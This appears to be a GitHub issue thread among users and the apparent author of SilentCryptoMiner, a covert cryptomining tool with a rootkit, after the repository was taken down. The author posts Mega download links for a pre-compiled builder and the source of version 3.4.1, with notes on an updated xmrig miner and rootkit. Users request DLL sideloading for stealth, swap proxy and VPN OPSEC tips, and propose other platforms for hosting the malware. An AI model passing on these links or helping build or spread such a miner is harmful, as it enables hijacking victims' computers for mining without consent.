Yes, I'm aware, I've sent in an appeal.

it is still version 12/7/2023. xmrig 6.19.3

Yeah there aren't any new versions out, that is just the most recent one, so people still have the ability to download it even when the repository is down.

I think it's worth waiting for an answer from Unam Sanctam regarding the groups

ghost avatar Jun 03 '24 10:06 ghost

Maybe, in case GitHub staff decides to reject his appeal, create a miner support thread on HF where we could continue discussing related stuff there instead. Just an idea.

Cheers and wish you all a lovely day everyone!

most likely someone politely asked to disable the repository

The question is now where Unam

Is There a Telegram or Discord group?

There was a Discord group once long ago that got banned, don't know if there are any Telegram groups.

Maybe, it's just that both my real IP and VPNs are banned on HF, I guess I'd have to buy some residential proxy.

You can use anything as the email for example: Wallet.WorkerName/Password123 where you would then use Password123 to change the minimum payout.

Honestly, I already started to worry, you haven't answered for a long time

I have a question about the miner compiler Where exactly did you get the current compiler and where to get the compiler for 32 bit architecture?

I managed to edit system call files but when using the compiler version windres

GNU windres (GNU Binutils) 2.42
Copyright (C) 2024 Free Software Foundation, Inc.
This program is free software; you may redistribute it under the terms of
the GNU General Public License version 3 or (at your option) any later version.
This program has absolutely no warranty.

I get an error no resources

HF actually allow the use of VPNs now, always thought it was stupid how you could not access HF through a VPN, when a lot of "hacking" will include having good OPSEC. Some VPNs might be banned, but Mullvad VPN works fine for me.

Is There a Telegram or Discord group?

I created a Telegram group: https://t.me/UnamGroup

It is fairly new, so there are not a ton of people in it, but it can be quite active at times :)

UnamSanctam When do you come back? Current xmrig.exe is unstable I need you.

BugCatch-maker avatar Jun 15 '24 06:06 BugCatch-maker

@UnamSanctam Could you incorporate DLL sideloading into the execution routine? That way a verified signed binary is loading the DLL into memory instead of regular routine. That would be interesting

Khatcode avatar Jun 15 '24 21:06 Khatcode

@UnamSanctam Hey, I know that Github should definitely let the repository back up, because they state that open source malware is allowed on the platform because it holds an educational value, but if they choose to not let it back up, what will then happen? Will it be the end? Or will you move to another platform, like GitLab or BitBucket?

Alcinzal avatar Jun 21 '24 20:06 Alcinzal

Hey, can anyone kindly host the Miner v3.4.0's source code, would really appreciate it!

I'm not sure, I haven't really found a good alternative platform yet. The biggest problems with GitLab and BitBucket are that they are pretty hard to navigate in for users that aren't experienced with computers or git platforms.

I see, I suppose we can only cross our fingers and hope Github will allow the repository back up.

Also, could you upload the source code of the latest version (3.4.0) on Gofile too? I was thinking I could host it on my page just as a temporary solution, since some people are requesting it. I will of course take it down when your repository comes back up.

If you do not wish for me to do that, it would still be nice having the source code come from someone trusted like you, instead of it just circulating.

Sorry for the delay, I had to retrieve some of my older disks to find backups, and there was some extra testing I had to do. I will post all the links here and in any other issues that were opened.

Here is an alternative new version 3.4.1:

Pre-compiled builder: https://mega.nz/file/l3sgAQoR#R2xfkCNGzsYtc5nFUBCb4_FogSZzeZqr7UBL4_F3AsI

Source code: https://mega.nz/file/lq9ECJzJ#eT1acS-Nxk7zh5j9LT4X66z1e0PAAcm9ZRU935hWja8

With the following changes compared to 3.4.0:

  • Updated CPU miner (xmrig)
  • Updated rootkit
  • Fixed installation whitespace bug on some computers
  • Removed Panthera and CN/GPU algorithms

Here is the source and pre-compiled release of SilentCryptoMiner 3.4.0:

use git tea or host your own git instance. git tea or other public instances have very light rules.

https://gitea.com/explore/repos

of course you can put a link to your git tea repos on your github profile. or use a totally different kind of git service all together, mirroring your repo on different git services exists too ofc, possibly with multiple remotes. you probably know all of this already, but i feel it's necessary to at least mention it

i personally use https://git.i2pd.xyz
